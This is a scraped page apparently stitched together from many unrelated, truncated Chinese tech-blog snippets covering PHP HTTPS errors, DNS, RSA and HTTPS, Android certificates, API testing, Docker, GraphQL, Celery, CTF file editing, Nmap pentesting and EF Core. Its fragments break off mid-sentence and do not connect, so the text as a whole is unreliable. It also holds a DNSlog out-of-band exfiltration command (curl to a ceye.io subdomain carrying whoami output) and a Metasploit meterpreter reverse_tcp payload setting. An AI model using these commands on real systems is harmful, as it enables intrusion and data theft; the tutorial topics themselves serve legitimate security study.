最近陆陆续续接到网友反馈,导航主题在部分情况下会出现错误,起初我也是懵的,因为我的站点并没有发现这个错误,解决起来比较麻烦,排查了很久一直都未出现问题,但是部分客户真的遇到了,而且错误代码也已经给出,的的确确是导航问题...,因为本站使用的是php7.1,没有问题,但是也不能让所有人都去升级,毕竟有些虚拟机升级可能不是很方法,所以还得从跟上排查,zblogphp所给出的错误代码如下: “E_WARNING : file_get_contents...1&fr=topcategory_c513): failed to open stream: No such file or directory (set_error_handler) ”用file_get_contents...自行百度,查看“file_get_contents”这个函数,于是乎大概知道什么原因了,就是“file_get_contents”在获取https的连接时会出现如上的错误提示,百度的解决办法一般都是修改...不过我测试了完全不管用,修改了“extension=php_openssl.dll”文件之后无法重启php,这就尴尬了。
服务器中哪一个是主服务器。...如果缓存中没有的话,ISPDNS会从配置文件里面读取13个根域名服务器的地址(这些地址是不变的,直接在BIND的配置文件中)。 5. 然后像其中一台发起请求。 6....DNSlog注入 在测试一些网站的时候,一些注入类的漏洞都是没有任何回显信息的,这个时候我们很难判断自己的payload是否执行成功,这个时候可以借助dnslog。...简单的理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候可以通过这种方式把想获得的数据外带出来。 Dnslog基本原理 ?...先用自己的vps简单的演示一下: 比如:curl http://ip.port.b182oj.ceye.io/whoami 这个时候需要根据实际情况对payload进行替换,ip 、port、 Identifier
本文在阅读不少他人的优秀博文以及查阅HTTPS协议和RSA等相关资料的基础上整理而成,包含了RSA算法的详细原理及其在HTTPS中的应用。...RSA作为HTTPS协议中最为核心的加密/解密算法,其原理却很简单,很容易理解。当你读完本文之后,你也会惊叹于RSA算法发明者的奇思妙想。 首先,RSA的密钥越长,就越难破解。...但在实际的应用中,我们还需要解决另外一个问题——中间人攻击:在A、B两人建立会话的过程中,攻击者很容易在线路中间操纵信息,让A、B两人误以为他们是在直接对话。...,想了解RSA算法在HTTPS中具体是如何应用的,强烈推荐这篇博文。...##十三、相关链接 RSA算法原理 跨越千年的RSA算法 HTTPS是如何保证连接安全:每位Web开发者都应知道的 浅谈HTTPS以及Fiddler抓取HTTPS协议 https真的安全吗,加密登录其实不简单
本文首先分析HTTP协议在安全性上的不足,进而阐述HTTPS实现安全通信的关键技术点和原理。然后通过抓包分析HTTPS协议的握手以及通信过程。...最后总结一下自己在开发过程中遇到的HTTPS相关的问题,并给出当前项目中对HTTPS问题的系统解决方案,以供总结和分享。如有不当之处,欢迎批评和指正。...可能是购买的CA证书比较新,Android系统还未信任,也可能是服务器使用的是自签名证书(这个在测试阶段经常遇到)。 ...(4) Android上TLS版本兼容问题 之前在接口联调的过程中,测试那边反馈过一个问题是在Android 4.4以下的系统出现HTTPS请求不成功而在4.4以上的系统上却正常的问题。...(自定义信任的证书集合,并使用客户端证书) makeContextToTrustAll (信任所有的CA证书,不安全,仅供测试阶段使用) (2) 单向验证并自定义信任的证书集合 在App中,把服务端证书放到资源文件下
前言 在进行接口测试时,了解不同的HTTP请求方法对于正确测试和评估接口功能至关重要。本文将探讨HTTP协议中GET和POST请求方法在接口测试中的区别以及它们的特点和应用场景。...GET请求的特点与应用 GET请求是一种向服务器请求获取资源的方法。它具有以下特点: 数据在URL中通过查询字符串传递。 请求参数在URL中可见,易于调试和测试。...GET和POST接口测试的区别 在接口测试中,GET和POST请求的区别在于: 参数传递方式:GET请求通过URL的查询字符串传递参数,而POST请求通过请求主体传递参数。...总结 在HTTP协议中,GET和POST是常用的请求方法。...在接口测试中,需要注意它们的参数传递方式、可见性、数据长度限制和幂等性等方面的区别,以保证对接口功能的准确测试和评估。
前言 常规的APP检查项目中,每个安全测试周期里,肯定是要覆盖客户APP的检查,在一些SRC里 企业里 都是必不可少的一环。...内网地址泄漏 等等等等 因为有些漏洞很简单,在安全测试中只算一个风险等级不是很高的测试用例项,所以不过多介绍,那么可以介绍下常见的一些工具 比如测试一些越权 劫持 注入的Dz friada GDA modsf...一般我们拿到的APP要么是正式版加壳的(在外部测试中也会遇到未加壳的应用这种应用危害等级根据行业变化而变化) 要么是没壳的测试状态,使用APP查壳工具 即可识别到App是否加壳 首先通过豌豆荚获得一个...,直接按照大佬的方式解决就行了 链接https://blog.csdn.net/qq_34594929/article/details/128873722 然后像一些注入 越权等漏洞就可以直接测试,但是我经过测试发现.../.MainActivity 在测试中,我们尽量多方向的测试,从本身的APP测试折腾完事后,我们便可以对APP业务进行测试,比如是否有窥屏保护,使用使用scrcpy.exe对其进行远程监控,查看电脑端显示页面是否存在
目前常用的加密算法主要分成三类: 对称加密算法 非对称加密算法 消息摘要算法 在互联网中,信息防护主要涉及两个方面:信息窃取和信息篡改。...在这个过程中,公钥负责加密,私钥负责解密,数据在传输过程中即使被截获,攻击者由于没有私钥,因此也无法破解。 非对称加密算法的加解密速度低于对称加密算法,但是安全性更高。...对称/非对称加密算法在HTTPS协议中的应用 HTTPS其实是有两部分组成:HTTP + SSL / TLS,也就是在HTTP上又加了一层处理加密信息的模块。...客户端发起HTTPS请求 这个没什么好说的,就是用户在浏览器里输入一个https网址,然后连接到server的443端口。...非对称加密算法的性能是非常低的,原因在于寻找大素数、大数计算、数据分割需要耗费很多的CPU周期,所以一般的HTTPS连接只在第一次握手时使用非对称加密,通过握手交换对称加密密钥,在之后的通信走对称加密。
,关于如何进行安全配置,这里有两个方案: 1、普通模式:直接在代理服务器中,配置证书,做HTTPS代理,常见的就是在Nginx中处理,我的官网和认证中心都是这么处理的,而且也对Http做了跳转,访问域名...那接下来咱们就说下,如何把项目用HTTPS模式启动。 2、项目中配置HTTPS模式 这个是很简单的,只需要简单配置下启动服务就行。...3、在Docker中测试 可是我们都知道,如果你使用Docker的话,容器内部是没有localhost的,因为是用的IPv6,那这种配置就是不行。...其实定心一看,应该也能明白发生了什么,就是在Docker中这么启动HTTPS的话,是不允许的,因为没有服务证书,本地vs开发肯定不会有这个问题,这就是环境的差异性。...这个就是今天的重点问题出现了,在Docker中如何合理配置安全证书HTTPS。
SpringJUnit4ClassRunner; /** * zt * 2020/10/12 * 21:38 */ //@RunWith(SpringJUnit4ClassRunner.class),让测试运行于...Spring测试环境 @RunWith(SpringJUnit4ClassRunner.class) //用于测试加载spring环境常与@RunWith联用 @ContextConfiguration
安装必要的库在Python中,我们将使用graphene来创建GraphQL服务器,使用requests库来发送HTTP请求。首先,我们需要安装这些库。...设置GraphQL服务器首先,我们需要创建一个简单的GraphQL服务器。这里我们将使用graphene库来定义GraphQL的Schema和Resolver。...print(f"ID: {user['id']}, Username: {user['username']}, Email: {user['email']}")总结到此为止,我们已经完成了一个简单的...通过这个教程,你应该能够在Python项目中使用GraphQL来进行高效的数据获取。...当然,GraphQL还有很多高级特性和用法,比如Mutations、Subscriptions、Fragments等,你可以在实际项目中逐步探索和应用。后面我们将会在Django中结合使用。
1、celery 架构 Celery是一个简单、灵活且可靠的,处理大量消息的分布式系统,专注于实时处理的异步任务队列。同时也支持任务调度。...2、celery 的简单使用 首先需要安装celery模块:pip install celery 2.1 最简单的使用 写一个py文件(celery_task.py): from celery import...if __name__ == '__main__': async = AsyncResult(id=id, app=app) ''' 在Python3.7及以后的版本中async成为了保留关键字...print(ret) 根据返回的id取处理结果 2.3 celery执行定时任务 在celery_task 包的celery.py 中: from celery import Celery from datetime...中的使用 在Django项目的根目录新建一个celery_task包。
一: 在GET请求中,常见的几种传参格式包括: 1:查询字符串(Query String): 在URL中使用?符号将参数附加到URL末尾,多个参数之间使用&符号分隔。...例如: GET /api/users?id=12345&name=John 2:RESTful风格的URL参数: 将参数直接作为URL的一部分,一般用于表示资源的唯一标识符或路径参数。...例如: GET /api/users/12345 3:参数数组: 使用相同的参数名,但允许多个值的情况。参数值使用[]表示。例如: GET /api/users?...filter[]=admin&filter[]=active 4:参数对象(JSON格式): 将参数封装在一个对象中,然后将该对象作为查询字符串的值传递。例如: GET /api/users?...二:在POST请求中,常见的几种传参格式 在POST请求中,常见的几种传参格式包括: 1:JSON 数据格式: 在请求的数据体中使用 JSON 格式来传递参数。
这里就谈谈winhex在CTF中的简单应用,欢迎各位大佬在评论区发表高端的操作技巧或者经验分享。...光标点击第一个字符处,点击 编辑——> 粘贴0字节——>在弹窗中输入0字节数的输入框里输入 4——>确定 ?...然后用一些看图软件或者gif编辑工具,逐帧查看记录下flag即可 这里推荐一个在线转换编辑gif的工具https://ezgif.com/功能很丰富。...修改图片IHDR 文件头数据块IHDR(header chunk):它包含有PNG文件中存储的图像数据的基本信息,并要作为第一个数据块出现在PNG数据流中,而且一个PNG数据流中只能有一个文件头数据块。...其他 CTF还会遇到一些几个文件合并成一个的,那种可以用 File_Analysis这个工具简单分析一下,然后打开winhex搜索文件头尾讲数据块复制出来另存实现文件分离。
CheckList策略应该由项目还是测试主导?这篇文章基于上述三个问题,就CheckList在测试过程中的落地实践,谈谈我的一些经验和理解,供大家参考。谁来主导CheckList执行?...从测试同学的角度来说,我们的岗位职责就是质量保障,所有可能导致风险的点都需要评估且进行充分验证。CheckList作为一种风险预防机制和验证方法,也是我很推荐测试同学在日常工作中去实践应用的。...在真实的项目实践和工作场景中,绝大多数工作都是需要多方协作配合才能完成的,因此只要有相同的目标,保持大体一致的迭代节奏,遵循一致的工作规范即可。至于采用哪种方法,见仁见智吧。...CheckList的落地执行案例给大家列举一个我以前工作中的案例。当时我管理的团队有一块内容是负责用户业务的质量保障工作,具体负责人是一个测试小姑娘。...,统一维护;将上述过程推动落地成为研发测试流程的一部分,形成质量门禁之一;将手动执行CheckList的方式变为自动化的方式,利用CICD或者融入发布流水线;以上内容,就是我对于CheckList策略在测试过程中落地实践的理解和一些经验之谈
Nmap这个神器在渗透测试中是必不可少的。从信息收集到拿shell。有时候还真少不了它!本文将要介绍nmap在渗透测试中,都有那些运用和攻击手段。...在第一步中,我们扫描到了3306端口,这也意味着目标可以远程登录数据库。...RHOSTS 192.168.123.66 set payload windows/x64/meterpreter/reverse_tcp exploti image.png 通过上诉示例,我们利用nmap从简单的信息收集到拿...一次完整的渗透测试就完成了。...版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/2101.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
至此,完成了 加载驱动 -> 建立连接 -> 执行命令 -> 返回结果 这样的和数据库交互的整个过程。如果把这个过程灵活的嵌入到 PTS 性能测试中,便可以解决前言提到的各种问题。...JDBC 在性能测试中的应用 数据库性能测试 背景 大多数对数据库的操作都是通过 HTTP、FTP 或其他协议执行的,但是在某些情况下,绕开中间协议直接测试数据库也很有意义。...例如我们希望不触发所有相关查询,而只测试特定 high-value 查询的性能;验证新数据库在高负载下的性能。2.验证某些数据库连接池参数,例如最大连接数 3.节省时间和资源。...同时,PTS 还支持提取 ResultSet 中的数据作为出参,给下游 API 使用;对响应进行断言。 3、压测中监控和压测报告。在压测过程中观察 RDS 实时性能指标。...此外,PTS 还提供清晰完备的压测报告以及采样日志,供用户随时查看。 压测数据构造 背景 在模拟不同用户登录、压测业务参数传递等场景中,需要使用参数功能来实现压测的请求中各种动态操作。
介绍 接口测试的方式有很多,可以使用的工具有jmeter,postman,soapUI等,也可以自己写代码进行接口测试(Python,java,go等等),工具的使用相对来说都比较简单,开箱即用。...本文中使用的Python版本为3.9.0,下面简单介绍下http、websocket、grpc接口示例,最后介绍使用PyQt5打造自己的测试工具。...,"wendu":"23"},"status":1000,"desc":"OK"}' 假如服务对请求中city的一致性进行校验,header中需要传入Authorization,为city值的md5 import...Github API v3 接受编码为JSON的POST数据 import json url = 'https://api.github.com/some/endpoint' payload = {'some...打造自己的测试工具 在编辑器中执行测试,有时候交互性不太友好,因此我们可以打造一个带交互界面的测试工具。QT是跨平台C++库的集合,它实现高级API来访问现代桌面和移动系统的许多方面。
CheckList策略应该由项目还是测试主导? 这篇文章基于上述三个问题,就CheckList在测试过程中的落地实践,谈谈我的一些经验和理解,供大家参考。 谁来主导CheckList执行?...从测试同学的角度来说,我们的岗位职责就是质量保障,所有可能导致风险的点都需要评估且进行充分验证。CheckList作为一种风险预防机制和验证方法,也是我很推荐测试同学在日常工作中去实践应用的。...在真实的项目实践和工作场景中,绝大多数工作都是需要多方协作配合才能完成的,因此只要有相同的目标,保持大体一致的迭代节奏,遵循一致的工作规范即可。至于采用哪种方法,见仁见智吧。...CheckList的落地执行案例 给大家列举一个我以前工作中的案例。 当时我管理的团队有一块内容是负责用户业务的质量保障工作,具体负责人是一个测试小姑娘。...,统一维护; 将上述过程推动落地成为研发测试流程的一部分,形成质量门禁之一; 将手动执行的方式变为自动化的方式,利用CICD或者融入发布流水线; 以上内容,就是我对于CheckList策略在测试过程中落地实践的理解和一些经验之谈
在Entity Framework Core (EF Core)中,许多SQL语句的功能可以通过LINQ(Language Integrated Query)查询或EF Core特定的方法来实现。...虽然EF Core并不直接映射SQL函数到C#函数,但它提供了丰富的API来执行类似SQL中的操作,如聚合、筛选、排序、连接等。...下面是一些常用SQL操作及其在EF Core中的对应实现方式:SQL操作EF Core实现示例SELECTLINQ查询var result = context.Blogs.Select(b => new...Aggregate Functionsvar count = context.Blogs.Count(); var maxId = context.Blogs.Max(b => b.Id);上述示例中的...在实际应用中,用户需要根据自己的数据库上下文类名来替换context。对于更复杂的SQL函数,如字符串处理函数、日期时间函数等,EF Core通常不直接提供与SQL函数一一对应的C#函数。
您可以依赖一个安全的HTTPS请求,只要: 1、未忽略任何SSL证书警告 2、Web服务器用于启动SSL连接的私钥在Web服务器本身之外不可用。...因此,在网络层面,URL参数是安全的,但是其他一些途径会泄漏基于URL的数据: 1、URL存储在Web服务器日志中 - 特别是每个请求的整个URL都存储在服务器日志中。...以下是使用查询字符串通过HTTPS发送密码时存储在httpwatch.com服务器日志中的条目: 2009-02-20 10:18:27 W3SVC4326 WWW 208.101.31.210 GET...存储明文密码通常不是一个好主意,即使是在服务器上。 2、网址存储在浏览器历史记录中 - 即使安全网页本身未缓存,浏览器也会将网址参数保存在其历史记录中。 以下是显示URL参数的IE历史记录 ?...使用会话级Cookie来传递此信息的优点是: 它们不存储在浏览器历史记录中或磁盘上 它们通常不存储在服务器日志中 它们不会传递到嵌入式资源,例如图片或JavaScript库 它们仅适用于发出它们的域和路径
云服务器
ICP备案
云直播
实时音视频
即时通信 IM
